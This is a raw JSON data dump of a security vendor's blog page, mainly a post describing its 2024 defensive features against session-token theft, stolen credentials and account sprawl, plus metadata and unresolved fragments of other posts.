",{"data":54774,"content":54775,"nodeType":860},{},[54776,54779,54789],{"data":54777,"marks":54778,"value":1238,"nodeType":864},{},[],{"data":54780,"content":54782,"nodeType":883},{"uri":54781},"https://pushsecurity.com/blog/introducing-session-token-theft-detection-why-browser-is-best/",[54783],{"data":54784,"marks":54785,"value":54788,"nodeType":864},{},[54786,54787],{"type":1455},{"type":899},"session theft detection",{"data":54790,"marks":54791,"value":54792,"nodeType":864},{},[]," capability uses the power of the Push browser extension to inject a unique marker into the user-agent string of sessions that occur in browsers enrolled in Push. ",{"data":54794,"content":54795,"nodeType":860},{},[54796],{"data":54797,"marks":54798,"value":54799,"nodeType":864},{},[],"By analyzing logs from your IdP in your SIEM, you can then identify activity from the same session that both has and that lacks the Push marker, indicating that a session has been extracted from the browser and maliciously imported into a different browser that is not enrolled in Push.",{"data":54801,"content":54802,"nodeType":860},{},[54803],{"data":54804,"marks":54805,"value":54806,"nodeType":864},{},[],"This is a reliable signal that a stolen session token is being used and an endpoint has been compromised.",{"data":54808,"content":54812,"nodeType":996},{"target":54809},{"sys":54810},{"id":54811,"type":1001,"linkType":1002},"1XNNkaoW64t3PPvC54KGXF",[],{"data":54814,"content":54818,"nodeType":996},{"target":54815},{"sys":54816},{"id":54817,"type":1001,"linkType":1002},"6dOEnPzZXd9DqeSdalqlzO",[],{"data":54820,"content":54821,"nodeType":1005},{},[],{"data":54823,"content":54824,"nodeType":1009},{},[54825],{"data":54826,"marks":54827,"value":54828,"nodeType":864},{},[],"Detecting compromised credentials",{"data":54830,"content":54831,"nodeType":1312},{},[54832],{"data":54833,"marks":54834,"value":54212,"nodeType":864},{},[54835],{"type":899},{"data":54837,"content":54838,"nodeType":860},{},[54839],{"data":54840,"marks":54841,"value":54842,"nodeType":864},{},[],"Alongside stolen session cookies, stolen credentials made a lot of headlines last year. The 2024 Verizon DBIR found that 79% of web application compromises were the result of breached creds, and researchers at IBM found a 71% year-over-year increase in cyberattacks using stolen or compromised credentials.",{"data":54844,"content":54845,"nodeType":860},{},[54846,54850,54859],{"data":54847,"marks":54848,"value":54849,"nodeType":864},{},[],"In Push’s own research, we counted ",{"data":54851,"content":54853,"nodeType":883},{"uri":54852},"https://pushsecurity.com/blog/2024-identity-breaches/",[54854],{"data":54855,"marks":54856,"value":54858,"nodeType":864},{},[54857],{"type":1455},"30 public identity-related breaches",{"data":54860,"marks":54861,"value":54862,"nodeType":864},{},[]," in 2024 where the breach and the breach vector were disclosed. Of those, nearly three-quarters were the result of compromised credentials, including notable breaches such as Microsoft, Change Healthcare, and the attacks on Snowflake customers.",{"data":54864,"content":54865,"nodeType":1116},{},[54866],{"data":54867,"content":54868,"nodeType":860},{},[54869],{"data":54870,"marks":54871,"value":54872,"nodeType":864},{},[],"73% of public identity-related breaches in 2024 were the result of compromised credentials (the rest were phishing attacks). ",{"data":54874,"content":54875,"nodeType":860},{},[54876,54880,54888],{"data":54877,"marks":54878,"value":54879,"nodeType":864},{},[],"The influx of compromised credentials has been amplified by the ",{"data":54881,"content":54882,"nodeType":883},{"uri":54721},[54883],{"data":54884,"marks":54885,"value":54887,"nodeType":864},{},[54886],{"type":1455},"rise of infostealers",{"data":54889,"marks":54890,"value":54891,"nodeType":864},{},[],", which contribute the vast majority of valid stolen credentials, alongside mass credential phishing campaigns and third-party data breach dumps. ",{"data":54893,"content":54894,"nodeType":860},{},[54895],{"data":54896,"marks":54897,"value":54898,"nodeType":864},{},[],"And while there’s no shortage of threat intelligence about stolen credentials for sale on the web, security teams struggle to separate the needle from the haystack because a large portion of TI on stolen creds is out of date.",{"data":54900,"content":54901,"nodeType":860},{},[54902],{"data":54903,"marks":54904,"value":54905,"nodeType":864},{},[],"In evaluating TI data here at Push, we reviewed 5,763 username and password combos that matched domains in use by Push customers. We found that less than 1% of the creds in a multi-vendor dataset were true positives. In other words, 99.5% of the stolen creds we checked were false positives at the time of review — illustrating the challenge security teams face when trying to extract actionable intelligence from this kind of data. ",{"data":54907,"content":54908,"nodeType":1116},{},[54909],{"data":54910,"content":54911,"nodeType":860},{},[54912],{"data":54913,"marks":54914,"value":54915,"nodeType":864},{},[],"99.5% of the findings in compromised credential feeds were found to be false positives.",{"data":54917,"content":54918,"nodeType":1312},{},[54919],{"data":54920,"marks":54921,"value":54281,"nodeType":864},{},[54922],{"type":899},{"data":54924,"content":54925,"nodeType":860},{},[54926],{"data":54927,"marks":54928,"value":54929,"nodeType":864},{},[],"Using its browser agent, Push assesses the strength of end-user passwords by creating and analyzing a truncated, salted SHA256 hash of the password for a given account. (These k-anonymized fingerprints are never seen by Push’s back-end and exist only in local browser extension storage.) ",{"data":54931,"content":54932,"nodeType":860},{},[54933,54937,54946],{"data":54934,"marks":54935,"value":54936,"nodeType":864},{},[],"These fingerprints give Push a directly observable source of truth for corporate creds, which allowed us to build a ",{"data":54938,"content":54939,"nodeType":883},{"uri":49554},[54940],{"data":54941,"marks":54942,"value":54945,"nodeType":864},{},[54943,54944],{"type":1455},{"type":899},"verified stolen credential detection",{"data":54947,"marks":54948,"value":54949,"nodeType":864},{},[]," capability last year that removes all false positives from TI sources to pinpoint only those stolen creds still actively in use by employees.",{"data":54951,"content":54955,"nodeType":996},{"target":54952},{"sys":54953},{"id":54954,"type":1001,"linkType":1002},"3BITHZvDadjHpOAqIn0g4w",[],{"data":54957,"content":54958,"nodeType":1005},{},[],{"data":54960,"content":54961,"nodeType":1009},{},[54962],{"data":54963,"marks":54964,"value":54965,"nodeType":864},{},[],"Reducing and securing shadow IT and account sprawl",{"data":54967,"content":54968,"nodeType":860},{},[54969],{"data":54970,"marks":54971,"value":54972,"nodeType":864},{},[],"You can think of this last part of the story as the ground from which the attack trends we’ve been talking about emerged: The shift to doing business almost entirely in the browser, and the resulting sprawl in accounts and unmanaged apps, leading to an explosion of internet-facing identities for threat actors to target.",{"data":54974,"content":54975,"nodeType":860},{},[54976],{"data":54977,"marks":54978,"value":54979,"nodeType":864},{},[],"Even in organizations with mature security practices, the challenge of getting 100% compliance with identity posture best practices is evident. Last year, Push researchers analyzed a data set of 300,000 accounts from our customer base and found that:",{"data":54981,"content":54982,"nodeType":941},{},[54983,55002,55021],{"data":54984,"content":54985,"nodeType":945},{},[54986],{"data":54987,"content":54988,"nodeType":860},{},[54989,54993,54998],{"data":54990,"marks":54991,"value":54992,"nodeType":864},{},[],"Organizations have ",{"data":54994,"marks":54995,"value":54997,"nodeType":864},{},[54996],{"type":899},"more apps and identities than they thought",{"data":54999,"marks":55000,"value":55001,"nodeType":864},{},[]," — an average of ~15 identities per employee and ~220 apps per organization.",{"data":55003,"content":55004,"nodeType":945},{},[55005],{"data":55006,"content":55007,"nodeType":860},{},[55008,55012,55017],{"data":55009,"marks":55010,"value":55011,"nodeType":864},{},[],"Many accounts ",{"data":55013,"marks":55014,"value":55016,"nodeType":864},{},[55015],{"type":899},"lack basic security protections",{"data":55018,"marks":55019,"value":55020,"nodeType":864},{},[],", with 37% of accounts lacking any form of MFA and ~9% of accounts using a password that is leaked, weak, or reused, making them especially susceptible to account takeover. On accounts where password is the only login method in use (e.g. not using SSO or any other federated login like OIDC), there was no MFA in use in 4 out of 5 cases.",{"data":55022,"content":55023,"nodeType":945},{},[55024],{"data":55025,"content":55026,"nodeType":860},{},[55027,55031,55036,55040,55048],{"data":55028,"marks":55029,"value":55030,"nodeType":864},{},[],"Security ",{"data":55032,"marks":55033,"value":55035,"nodeType":864},{},[55034],{"type":899},"gaps persist even with SSO",{"data":55037,"marks":55038,"value":55039,"nodeType":864},{},[]," accounts — with 10% of SSO-using accounts also having a local password, a risk for ",{"data":55041,"content":55043,"nodeType":883},{"uri":55042},"https://pushsecurity.com/blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you/",[55044],{"data":55045,"marks":55046,"value":19137,"nodeType":864},{},[55047],{"type":1455},{"data":55049,"marks":55050,"value":55051,"nodeType":864},{},[],"; and 1 in 5 IdP accounts themselves missing MFA.",{"data":55053,"content":55054,"nodeType":860},{},[55055],{"data":55056,"marks":55057,"value":55058,"nodeType":864},{},[],"From our perspective, organizations need scalable controls, and they need easy-to-deploy tools that get them visibility of all their workforce identities, apps, and accounts alongside telemetry that makes the information actionable.",{"data":55060,"content":55061,"nodeType":860},{},[55062],{"data":55063,"marks":55064,"value":55065,"nodeType":864},{},[],"Push already provides a real-time inventory of all your accounts and apps, including internal corporate apps, and analyzes the security posture, login methods, and MFA status of those accounts to offer a comprehensive picture of your identity attack surface. ",{"data":55067,"content":55068,"nodeType":860},{},[55069],{"data":55070,"marks":55071,"value":55072,"nodeType":864},{},[],"To help customers enforce their security policies even more seamlessly, here’s what we built last year:",{"data":55074,"content":55075,"nodeType":1312},{},[55076],{"data":55077,"marks":55078,"value":55080,"nodeType":864},{},[55079],{"type":899},"1. App banners",{"data":55082,"content":55083,"nodeType":860},{},[55084,55088,55098],{"data":55085,"marks":55086,"value":55087,"nodeType":864},{},[],"With a range of modes from informing to blocking, ",{"data":55089,"content":55091,"nodeType":883},{"uri":55090},"https://pushsecurity.com/help/10106#start",[55092],{"data":55093,"marks":55094,"value":55097,"nodeType":864},{},[55095,55096],{"type":1455},{"type":899},"app banners",{"data":55099,"marks":55100,"value":55101,"nodeType":864},{},[]," allow security teams to communicate best practices and policies with end-users directly in their browser. It works by displaying a banner with your custom message on the login and signup pages for workplace apps. ",{"data":55103,"content":55104,"nodeType":860},{},[55105],{"data":55106,"marks":55107,"value":55108,"nodeType":864},{},[],"Using configuration rules, you can set conditions for how banner controls get applied. Common use cases include: Restricting use of GenAI software; carving out an exception for admins on a specific app; reminding users to log in with SSO instead of a password, and others. ",{"data":55110,"content":55114,"nodeType":996},{"target":55111},{"sys":55112},{"id":55113,"type":1001,"linkType":1002},"4RPHmeMLyZmb5V8rXYLtey",[],{"data":55116,"content":55117,"nodeType":1312},{},[55118,55123],{"data":55119,"marks":55120,"value":55122,"nodeType":864},{},[55121],{"type":899},"2. Password manager identification",{"data":55124,"marks":55125,"value":1171,"nodeType":864},{},[],{"data":55127,"content":55128,"nodeType":860},{},[55129,55133,55143],{"data":55130,"marks":55131,"value":55132,"nodeType":864},{},[],"We also expanded Push’s capability to observe employees’ account security posture by adding an identification of ",{"data":55134,"content":55136,"nodeType":883},{"uri":55135},"https://pushsecurity.com/blog/stop-users-saving-corp-creds-into-personal-password-managers/",[55137],{"data":55138,"marks":55139,"value":55142,"nodeType":864},{},[55140,55141],{"type":1455},{"type":899},"which password manager",{"data":55144,"marks":55145,"value":55146,"nodeType":864},{},[]," (if any) they’re using. ",{"data":55148,"content":55149,"nodeType":860},{},[55150],{"data":55151,"marks":55152,"value":55153,"nodeType":864},{},[],"We’ve heard from many security teams that they’re concerned about corporate credentials being stored in unapproved password managers — not to mention the ROI from ensuring employees are all using the corporate password manager you already pay for. This feature helps them achieve both objectives.",{"data":55155,"content":55156,"nodeType":1312},{},[55157],{"data":55158,"marks":55159,"value":55161,"nodeType":864},{},[55160],{"type":899},"3. MFA enforcement",{"data":55163,"content":55164,"nodeType":860},{},[55165,55169,55177],{"data":55166,"marks":55167,"value":55168,"nodeType":864},{},[],"Finally, we rounded out 2024 with a new security control called ",{"data":55170,"content":55171,"nodeType":883},{"uri":49649},[55172],{"data":55173,"marks":55174,"value":49655,"nodeType":864},{},[55175,55176],{"type":1455},{"type":899},{"data":55178,"marks":55179,"value":55180,"nodeType":864},{},[]," that builds on the popular app banners concept by detecting when users lack MFA and then prompting them to register for MFA. ",{"data":55182,"content":55183,"nodeType":860},{},[55184],{"data":55185,"marks":55186,"value":55187,"nodeType":864},{},[],"Admins choose which apps they wish to enforce MFA on, and the Push extension does the rest. ",{"data":55189,"content":55190,"nodeType":860},{},[55191],{"data":55192,"marks":55193,"value":55194,"nodeType":864},{},[],"Security teams we work with are especially eager to use this feature to close MFA coverage gaps on non-SSO and otherwise unmanaged applications.",{"data":55196,"content":55200,"nodeType":996},{"target":55197},{"sys":55198},{"id":55199,"type":1001,"linkType":1002},"4imhff7SWJi2Gan5iFEs2P",[],{"data":55202,"content":55203,"nodeType":1005},{},[],{"data":55205,"content":55206,"nodeType":1009},{},[55207],{"data":55208,"marks":55209,"value":55210,"nodeType":864},{},[],"Want to see more?",{"data":55212,"content":55213,"nodeType":860},{},[55214,55218,55225],{"data":55215,"marks":55216,"value":55217,"nodeType":864},{},[],"There’s a lot we didn’t touch on here that Push can help you achieve. If you’d like to learn more, ",{"data":55219,"content":55220,"nodeType":883},{"uri":5642},[55221],{"data":55222,"marks":55223,"value":55224,"nodeType":864},{},[],"set up a demo with our team",{"data":55226,"marks":55227,"value":55228,"nodeType":864},{},[]," or sign up yourself to have a look at the platform.","How real-world attacks and research drove Push’s most popular features of 2024","How in-the-wild attacks and our own R&D inspired what we built in 2024 to stop account takeover and reduce security risks across your workforce identities. ","2025-01-16T00:00:00.000Z","push-features-2024",{"items":55234},[55235,55237],{"sys":55236,"name":342},{"id":6596},{"sys":55238,"name":297},{"id":2732},{"items":55240},[55241],{"fullName":849,"firstName":850,"jobTitle":851,"profilePicture":55242},{"url":853},{"__typename":2059,"sys":55244,"content":55245,"title":48848,"synopsis":48849,"hashTags":59,"publishedDate":48850,"slug":48851,"tagsCollection":55519,"authorsCollection":55525},{"id":48534},{"json":55246},{"data":55247,"content":55248,"nodeType":856},{},[55249,55255,55271,55284,55290,55296,55299,55305,55311,55359,55365,55370,55373,55379,55385,55391,55397,55403,55417,55422,55428,55434,55448,55453,55459,55465,55471,55477,55483,55486,55492,55508,55513],{"data":55250,"content":55251,"nodeType":1009},{},[55252],{"data":55253,"marks":55254,"value":48545,"nodeType":864},{},[],{"data":55256,"content":55257,"nodeType":860},{},[55258,55261,55268],{"data":55259,"marks":55260,"value":48552,"nodeType":864},{},[],{"data":55262,"content":55263,"nodeType":883},{"uri":7425},[55264],{"data":55265,"marks":55266,"value":48560,"nodeType":864},{},[55267],{"type":1455},{"data":55269,"marks":55270,"value":10094,"nodeType":864},{},[],{"data":55272,"content":55273,"nodeType":860},{},[55274,55277,55281],{"data":55275,"marks":55276,"value":48570,"nodeType":864},{},[],{"data":55278,"marks":55279,"value":48575,"nodeType":864},{},[55280],{"type":1455},{"data":55282,"marks":55283,"value":48579,"nodeType":864},{},[],{"data":55285,"content":55286,"nodeType":860},{},[55287],{"data":55288,"marks":55289,"value":48586,"nodeType":864},{},[],{"data":55291,"content":55292,"nodeType":860},{},[55293],{"data":55294,"marks":55295,"value":48593,"nodeType":864},{},[],{"data":55297,"content":55298,"nodeType":1005},{},[],{"data":55300,"content":55301,"nodeType":1312},{},[55302],{"data":55303,"marks":55304,"value":48603,"nodeType":864},{},[],{"data":55306,"content":55307,"nodeType":860},{},[55308],{"data":55309,"marks":55310,"value":48610,"nodeType":864},{},[],{"data":55312,"content":55313,"nodeType":941},{},[55314,55323,55332,55341,55350],{"data":55315,"content":55316,"nodeType":945},{},[55317],{"data":55318,"content":55319,"nodeType":860},{},[55320],{"data":55321,"marks":55322,"value":48623,"nodeType":864},{},[],{"data":55324,"content":55325,"nodeType":945},{},[55326],{"data":55327,"content":55328,"nodeType":860},{},[55329],{"data":55330,"marks":55331,"value":48633,"nodeType":864},{},[],{"data":55333,"content":55334,"nodeType":945},{},[55335],{"data":55336,"content":55337,"nodeType":860},{},[55338],{"data":55339,"marks":55340,"value":48643,"nodeType":864},{},[],{"data":55342,"content":55343,"nodeType":945},{},[55344],{"data":55345,"content":55346,"nodeType":860},{},[55347],{"data":55348,"marks":55349,"value":48653,"nodeType":864},{},[],{"data":55351,"content":55352,"nodeType":945},{},[55353],{"data":55354,"content":55355,"nodeType":860},{},[55356],{"data":55357,"marks":55358,"value":48663,"nodeType":864},{},[],{"data":55360,"content":55361,"nodeType":860},{},[55362],{"data":55363,"marks":55364,"value":48670,"nodeType":864},{},[],{"data":55366,"content":55369,"nodeType":996},{"target":55367},{"sys":55368},{"id":48675,"type":1001,"linkType":1002},[],{"data":55371,"content":55372,"nodeType":1005},{},[],{"data":55374,"content":55375,"nodeType":1312},{},[55376],{"data":55377,"marks":55378,"value":48686,"nodeType":864},{},[],{"data":55380,"content":55381,"nodeType":860},{},[55382],{"data":55383,"marks":55384,"value":48693,"nodeType":864},{},[],{"data":55386,"content":55387,"nodeType":860},{},[55388],{"data":55389,"marks":55390,"value":48700,"nodeType":864},{},[],{"data":55392,"content":55393,"nodeType":860},{},[55394],{"data":55395,"marks":55396,"value":48707,"nodeType":864},{},[],{"data":55398,"content":55399,"nodeType":860},{},[55400],{"data":55401,"marks":55402,"value":48714,"nodeType":864},{},[],{"data":55404,"content":55405,"nodeType":1312},{},[55406,55409,55414],{"data":55407,"marks":55408,"value":48721,"nodeType":864},{},[],{"data":55410,"marks":55411,"value":48727,"nodeType":864},{},[55412,55413],{"type":1455},{"type":899},{"data":55415,"marks":55416,"value":48731,"nodeType":864},{},[],{"data":55418,"content":55421,"nodeType":996},{"target":55419},{"sys":55420},{"id":48736,"type":1001,"linkType":1002},[],{"data":55423,"content":55424,"nodeType":860},{},[55425],{"data":55426,"marks":55427,"value":48744,"nodeType":864},{},[],{"data":55429,"content":55430,"nodeType":860},{},[55431],{"data":55432,"marks":55433,"value":48751,"nodeType":864},{},[],{"data":55435,"content":55436,"nodeType":1312},{},[55437,55440,55445],{"data":55438,"marks":55439,"value":48758,"nodeType":864},{},[],{"data":55441,"marks":55442,"value":3053,"nodeType":864},{},[55443,55444],{"type":1455},{"type":899},{"data":55446,"marks":55447,"value":48767,"nodeType":864},{},[],{"data":55449,"content":55452,"nodeType":996},{"target":55450},{"sys":55451},{"id":48772,"type":1001,"linkType":1002},[],{"data":55454,"content":55455,"nodeType":860},{},[55456],{"data":55457,"marks":55458,"value":48780,"nodeType":864},{},[],{"data":55460,"content":55461,"nodeType":860},{},[55462],{"data":55463,"marks":55464,"value":48787,"nodeType":864},{},[],{"data":55466,"content":55467,"nodeType":860},{},[55468],{"data":55469,"marks":55470,"value":48794,"nodeType":864},{},[],{"data":55472,"content":55473,"nodeType":860},{},[55474],{"data":55475,"marks":55476,"value":48801,"nodeType":864},{},[],{"data":55478,"content":55479,"nodeType":860},{},[55480],{"data":55481,"marks":55482,"value":48808,"nodeType":864},{},[],{"data":55484,"content":55485,"nodeType":1005},{},[],{"data":55487,"content":55488,"nodeType":1009},{},[55489],{"data":55490,"marks":55491,"value":40331,"nodeType":864},{},[],{"data":55493,"content":55494,"nodeType":860},{},[55495,55498,55505],{"data":55496,"marks":55497,"value":48824,"nodeType":864},{},[],{"data":55499,"content":55500,"nodeType":883},{"uri":5642},[55501],{"data":55502,"marks":55503,"value":40352,"nodeType":864},{},[55504],{"type":1455},{"data":55506,"marks":55507,"value":48835,"nodeType":864},{},[],{"data":55509,"content":55512,"nodeType":996},{"target":55510},{"sys":55511},{"id":48840,"type":1001,"linkType":1002},[],{"data":55514,"content":55515,"nodeType":860},{},[55516],{"data":55517,"marks":55518,"value":21,"nodeType":864},{},[],{"items":55520},[55521,55523],{"sys":55522,"name":6593},{"id":6592},{"sys":55524,"name":342},{"id":6596},{"items":55526},[55527],{"fullName":4878,"firstName":4879,"jobTitle":851,"profilePicture":55528},{"url":4881},"blog/why-its-time-for-phishing-prevention-to-move-beyond-email",{"json":55531},{"data":55532,"content":55533,"nodeType":856},{},[55534],{"data":55535,"content":55536,"nodeType":860},{},[55537],{"data":55538,"marks":55539,"value":52506,"nodeType":864},{},[],{"id":51887,"publishedAt":55541},"2026-08-12T11:54:24.111Z",{"items":55543},[55544,55546],{"sys":55545,"name":6593},{"id":6592},{"sys":55547,"name":342},{"id":6596},{"items":55549},[55550,55552,55554,55556,55558,55560,55562,55564,55566,55568,55570,55572,55574,55576],{"sys":55551,"name":519,"slug":520,"tier":31},{"id":516},{"sys":55553,"name":279,"slug":280,"tier":31},{"id":276},{"sys":55555,"name":297,"slug":298,"tier":31},{"id":294},{"sys":55557,"name":342,"slug":343,"tier":31},{"id":339},{"sys":55559,"name":413,"slug":414,"tier":31},{"id":410},{"sys":55561,"name":261,"slug":262,"tier":45},{"id":258},{"sys":55563,"name":466,"slug":467,"tier":45},{"id":463},{"sys":55565,"name":475,"slug":476,"tier":45},{"id":472},{"sys":55567,"name":511,"slug":512,"tier":45},{"id":508},{"sys":55569,"name":324,"slug":325,"tier":45},{"id":321},{"sys":55571,"name":351,"slug":352,"tier":45},{"id":348},{"sys":55573,"name":624,"slug":625,"tier":45},{"id":621},{"sys":55575,"name":431,"slug":432,"tier":45},{"id":428},{"sys":55577,"name":571,"slug":572,"tier":45},{"id":568},"pKv0XFp-65fZyfYU7N0RcNivS_R_aM0oXomOCsaZEFA",{"id":55580,"title":54043,"authorsCollection":55581,"content":55586,"extension":228,"faqItemsCollection":56132,"faqTitle":59,"featured":6,"hashTags":59,"meta":56134,"metaTitle":56135,"ogImage":59,"postType":5740,"publishedDate":54045,"relatedBlogPostsCollection":56136,"slug":54046,"stem":57613,"subtitle":59,"summary":57614,"synopsis":54044,"sys":57625,"tagsCollection":57627,"topicsCollection":57633,"__hash__":57657},"blog/blog/how-aitm-phishing-kits-evade-detection.json",{"items":55582},[55583],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":55584,"profilePicture":55585},[4953],{"url":4955},{"json":55587,"links":56064},{"data":55588,"content":55589,"nodeType":856},{},[55590,55606,55622,55628,55633,55639,55645,55651,55657,55664,55680,55686,55692,55698,55703,55709,55735,55741,55747,55753,55759,55764,55770,55776,55782,55808,55813,55819,55825,55851,55856,55862,55868,55874,55880,55885,55890,55896,55902,55908,55913,55919,55925,55931,55937,55953,55966,55972,55978,55984,55989,55995,56011,56016,56022,56045,56051,56057],{"data":55591,"content":55592,"nodeType":860},{},[55593,55596,55603],{"data":55594,"marks":55595,"value":53490,"nodeType":864},{},[],{"data":55597,"content":55598,"nodeType":883},{"uri":53493},[55599],{"data":55600,"marks":55601,"value":53499,"nodeType":864},{},[55602],{"type":1455},{"data":55604,"marks":55605,"value":53503,"nodeType":864},{},[],{"data":55607,"content":55608,"nodeType":860},{},[55609,55612,55619],{"data":55610,"marks":55611,"value":53510,"nodeType":864},{},[],{"data":55613,"content":55614,"nodeType":883},{"uri":35355},[55615],{"data":55616,"marks":55617,"value":53518,"nodeType":864},{},[55618],{"type":1455},{"data":55620,"marks":55621,"value":53522,"nodeType":864},{},[],{"data":55623,"content":55624,"nodeType":860},{},[55625],{"data":55626,"marks":55627,"value":53529,"nodeType":864},{},[],{"data":55629,"content":55632,"nodeType":996},{"target":55630},{"sys":55631},{"id":53534,"type":1001,"linkType":1002},[],{"data":55634,"content":55635,"nodeType":860},{},[55636],{"data":55637,"marks":55638,"value":53542,"nodeType":864},{},[],{"data":55640,"content":55641,"nodeType":1009},{},[55642],{"data":55643,"marks":55644,"value":53549,"nodeType":864},{},[],{"data":55646,"content":55647,"nodeType":860},{},[55648],{"data":55649,"marks":55650,"value":53556,"nodeType":864},{},[],{"data":55652,"content":55653,"nodeType":860},{},[55654],{"data":55655,"marks":55656,"value":53563,"nodeType":864},{},[],{"data":55658,"content":55659,"nodeType":860},{},[55660],{"data":55661,"marks":55662,"value":53571,"nodeType":864},{},[55663],{"type":10610},{"data":55665,"content":55666,"nodeType":860},{},[55667,55670,55677],{"data":55668,"marks":55669,"value":53578,"nodeType":864},{},[],{"data":55671,"content":55672,"nodeType":883},{"uri":53581},[55673],{"data":55674,"marks":55675,"value":53587,"nodeType":864},{},[55676],{"type":1455},{"data":55678,"marks":55679,"value":2924,"nodeType":864},{},[],{"data":55681,"content":55682,"nodeType":1009},{},[55683],{"data":55684,"marks":55685,"value":53597,"nodeType":864},{},[],{"data":55687,"content":55688,"nodeType":860},{},[55689],{"data":55690,"marks":55691,"value":53604,"nodeType":864},{},[],{"data":55693,"content":55694,"nodeType":860},{},[55695],{"data":55696,"marks":55697,"value":53611,"nodeType":864},{},[],{"data":55699,"content":55702,"nodeType":996},{"target":55700},{"sys":55701},{"id":52212,"type":1001,"linkType":1002},[],{"data":55704,"content":55705,"nodeType":860},{},[55706],{"data":55707,"marks":55708,"value":53623,"nodeType":864},{},[],{"data":55710,"content":55711,"nodeType":860},{},[55712,55715,55722,55725,55732],{"data":55713,"marks":55714,"value":53630,"nodeType":864},{},[],{"data":55716,"content":55717,"nodeType":883},{"uri":53633},[55718],{"data":55719,"marks":55720,"value":53639,"nodeType":864},{},[55721],{"type":1455},{"data":55723,"marks":55724,"value":53643,"nodeType":864},{},[],{"data":55726,"content":55727,"nodeType":883},{"uri":53646},[55728],{"data":55729,"marks":55730,"value":53652,"nodeType":864},{},[55731],{"type":1455},{"data":55733,"marks":55734,"value":1774,"nodeType":864},{},[],{"data":55736,"content":55737,"nodeType":1009},{},[55738],{"data":55739,"marks":55740,"value":53662,"nodeType":864},{},[],{"data":55742,"content":55743,"nodeType":860},{},[55744],{"data":55745,"marks":55746,"value":53669,"nodeType":864},{},[],{"data":55748,"content":55749,"nodeType":860},{},[55750],{"data":55751,"marks":55752,"value":53676,"nodeType":864},{},[],{"data":55754,"content":55755,"nodeType":860},{},[55756],{"data":55757,"marks":55758,"value":53683,"nodeType":864},{},[],{"data":55760,"content":55763,"nodeType":996},{"target":55761},{"sys":55762},{"id":53688,"type":1001,"linkType":1002},[],{"data":55765,"content":55766,"nodeType":1009},{},[55767],{"data":55768,"marks":55769,"value":53696,"nodeType":864},{},[],{"data":55771,"content":55772,"nodeType":860},{},[55773],{"data":55774,"marks":55775,"value":53703,"nodeType":864},{},[],{"data":55777,"content":55778,"nodeType":1009},{},[55779],{"data":55780,"marks":55781,"value":53710,"nodeType":864},{},[],{"data":55783,"content":55784,"nodeType":860},{},[55785,55788,55795,55798,55805],{"data":55786,"marks":55787,"value":53717,"nodeType":864},{},[],{"data":55789,"content":55790,"nodeType":883},{"uri":53720},[55791],{"data":55792,"marks":55793,"value":53720,"nodeType":864},{},[55794],{"type":1455},{"data":55796,"marks":55797,"value":53729,"nodeType":864},{},[],{"data":55799,"content":55800,"nodeType":883},{"uri":53732},[55801],{"data":55802,"marks":55803,"value":53738,"nodeType":864},{},[55804],{"type":1455},{"data":55806,"marks":55807,"value":26971,"nodeType":864},{},[],{"data":55809,"content":55812,"nodeType":996},{"target":55810},{"sys":55811},{"id":53746,"type":1001,"linkType":1002},[],{"data":55814,"content":55815,"nodeType":1009},{},[55816],{"data":55817,"marks":55818,"value":53754,"nodeType":864},{},[],{"data":55820,"content":55821,"nodeType":860},{},[55822],{"data":55823,"marks":55824,"value":53761,"nodeType":864},{},[],{"data":55826,"content":55827,"nodeType":860},{},[55828,55831,55838,55841,55848],{"data":55829,"marks":55830,"value":53768,"nodeType":864},{},[],{"data":55832,"content":55833,"nodeType":883},{"uri":53771},[55834],{"data":55835,"marks":55836,"value":53771,"nodeType":864},{},[55837],{"type":1455},{"data":55839,"marks":55840,"value":53780,"nodeType":864},{},[],{"data":55842,"content":55843,"nodeType":883},{"uri":53783},[55844],{"data":55845,"marks":55846,"value":53783,"nodeType":864},{},[55847],{"type":1455},{"data":55849,"marks":55850,"value":53792,"nodeType":864},{},[],{"data":55852,"content":55855,"nodeType":996},{"target":55853},{"sys":55854},{"id":53797,"type":1001,"linkType":1002},[],{"data":55857,"content":55858,"nodeType":1009},{},[55859],{"data":55860,"marks":55861,"value":53805,"nodeType":864},{},[],{"data":55863,"content":55864,"nodeType":860},{},[55865],{"data":55866,"marks":55867,"value":53812,"nodeType":864},{},[],{"data":55869,"content":55870,"nodeType":860},{},[55871],{"data":55872,"marks":55873,"value":53819,"nodeType":864},{},[],{"data":55875,"content":55876,"nodeType":860},{},[55877],{"data":55878,"marks":55879,"value":53826,"nodeType":864},{},[],{"data":55881,"content":55884,"nodeType":996},{"target":55882},{"sys":55883},{"id":53831,"type":1001,"linkType":1002},[],{"data":55886,"content":55889,"nodeType":996},{"target":55887},{"sys":55888},{"id":53837,"type":1001,"linkType":1002},[],{"data":55891,"content":55892,"nodeType":860},{},[55893],{"data":55894,"marks":55895,"value":53845,"nodeType":864},{},[],{"data":55897,"content":55898,"nodeType":1009},{},[55899],{"data":55900,"marks":55901,"value":53852,"nodeType":864},{},[],{"data":55903,"content":55904,"nodeType":860},{},[55905],{"data":55906,"marks":55907,"value":53859,"nodeType":864},{},[],{"data":55909,"content":55912,"nodeType":996},{"target":55910},{"sys":55911},{"id":53864,"type":1001,"linkType":1002},[],{"data":55914,"content":55915,"nodeType":860},{},[55916],{"data":55917,"marks":55918,"value":53872,"nodeType":864},{},[],{"data":55920,"content":55921,"nodeType":860},{},[55922],{"data":55923,"marks":55924,"value":53879,"nodeType":864},{},[],{"data":55926,"content":55927,"nodeType":1009},{},[55928],{"data":55929,"marks":55930,"value":53886,"nodeType":864},{},[],{"data":55932,"content":55933,"nodeType":860},{},[55934],{"data":55935,"marks":55936,"value":53893,"nodeType":864},{},[],{"data":55938,"content":55939,"nodeType":860},{},[55940,55943,55950],{"data":55941,"marks":55942,"value":53900,"nodeType":864},{},[],{"data":55944,"content":55945,"nodeType":883},{"uri":53903},[55946],{"data":55947,"marks":55948,"value":53903,"nodeType":864},{},[55949],{"type":1455},{"data":55951,"marks":55952,"value":53912,"nodeType":864},{},[],{"data":55954,"content":55955,"nodeType":860},{},[55956,55959,55963],{"data":55957,"marks":55958,"value":53919,"nodeType":864},{},[],{"data":55960,"marks":55961,"value":53924,"nodeType":864},{},[55962],{"type":899},{"data":55964,"marks":55965,"value":53928,"nodeType":864},{},[],{"data":55967,"content":55968,"nodeType":1009},{},[55969],{"data":55970,"marks":55971,"value":24968,"nodeType":864},{},[],{"data":55973,"content":55974,"nodeType":860},{},[55975],{"data":55976,"marks":55977,"value":53941,"nodeType":864},{},[],{"data":55979,"content":55980,"nodeType":860},{},[55981],{"